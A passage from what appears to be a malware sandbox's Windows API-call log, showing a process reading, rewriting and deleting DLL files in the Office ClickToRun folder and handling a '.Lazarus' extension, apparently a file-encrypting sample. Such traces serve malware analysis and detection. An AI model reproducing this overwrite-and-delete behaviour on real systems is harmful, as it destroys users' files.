(dwErrCode=0x0) [0088.461] GetLastError () returned 0x0 [0088.461] SetLastError (dwErrCode=0x0) [0088.462] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0088.462] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.462] GetLastError () returned 0x0 [0088.462] SetLastError (dwErrCode=0x0) [0088.462] GetLastError () returned 0x0 [0088.462] SetLastError (dwErrCode=0x0) [0088.462] GetLastError () returned 0x0 [0088.462] SetLastError (dwErrCode=0x0) [0088.462] GetLastError () returned 0x0 [0088.462] SetLastError (dwErrCode=0x0) [0088.462] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x2c0, lpOverlapped=0x0) returned 1 [0088.463] ReadFile (in: hFile=0x360, lpBuffer=0x8f658, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f658*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0088.463] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0088.463] GetLastError () returned 0x0 [0088.463] SetLastError (dwErrCode=0x0) [0088.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d648 | out: hHeap=0x20000) returned 1 [0088.463] WriteFile (in: hFile=0x348, lpBuffer=0x48c98*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x48c98*, lpNumberOfBytesWritten=0x327ef70*=0x2c0, lpOverlapped=0x0) returned 1 [0088.463] GetLastError () returned 0x0 [0088.463] SetLastError (dwErrCode=0x0) [0088.463] GetLastError () returned 0x0 [0088.463] SetLastError (dwErrCode=0x0) [0088.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0088.463] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0088.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0088.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0088.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x48c98 | out: hHeap=0x20000) returned 1 [0088.464] CloseHandle (hObject=0x348) returned 1 [0088.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.465] CloseHandle (hObject=0x360) returned 1 [0088.465] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0088.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0088.466] AreFileApisANSI () returned 1 [0088.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0088.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x4ebc8 [0088.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=98 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0088.466] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.467] GetFileType (hFile=0x360) returned 0x1 [0088.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f658 [0088.468] GetLastError () returned 0xb7 [0088.468] SetLastError (dwErrCode=0xb7) [0088.468] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0088.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f658 | out: hHeap=0x20000) returned 1 [0088.573] CloseHandle (hObject=0x360) returned 1 [0088.691] AreFileApisANSI () returned 1 [0088.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0088.691] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x4ebc8 [0088.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75c60, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=98 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0088.691] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll")) returned 1 [0088.699] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.700] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.700] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.700] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x1, dwReserved1=0x202fc, cFileName="api-ms-win-core-processthreads-l1-1-1.dll", cAlternateFileName="API-MS~4.DLL")) returned 1 [0088.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69080 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0088.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69080 | out: hHeap=0x20000) returned 1 [0088.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0088.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0088.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0088.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0088.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0088.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd0) returned 0x736b0 [0088.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0088.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd0) returned 0x73788 [0088.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x736b0 | out: hHeap=0x20000) returned 1 [0088.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73788 | out: hHeap=0x20000) returned 1 [0088.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0088.701] AreFileApisANSI () returned 1 [0088.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll", lpUsedDefaultChar=0x0) returned 100 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0088.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0088.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0088.701] AreFileApisANSI () returned 1 [0088.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0088.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x4ebc8 [0088.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=100 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0088.702] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.702] GetFileType (hFile=0x360) returned 0x1 [0088.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.702] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0088.702] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0088.702] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0088.702] CloseHandle (hObject=0x360) returned 1 [0088.703] AreFileApisANSI () returned 1 [0088.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0088.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x4ebc8 [0088.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=100 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0088.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.703] GetFileType (hFile=0x360) returned 0x1 [0088.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.703] CloseHandle (hObject=0x360) returned 1 [0088.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0088.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0088.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.705] AreFileApisANSI () returned 1 [0088.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc8) returned 0x4ebc8 [0088.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75cd8, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=100 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll") returned 100 [0088.705] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-processthreads-l1-1-1.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0)) returned 1 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0088.705] AreFileApisANSI () returned 1 [0088.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.705] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.705] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0088.705] GetLastError () returned 0x0 [0088.706] SetLastError (dwErrCode=0x0) [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df88 [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0088.706] GetLastError () returned 0x0 [0088.706] SetLastError (dwErrCode=0x0) [0088.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x60348 [0088.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.706] AreFileApisANSI () returned 1 [0088.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x60348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0088.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x144) returned 0x4e568 [0088.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x60348, 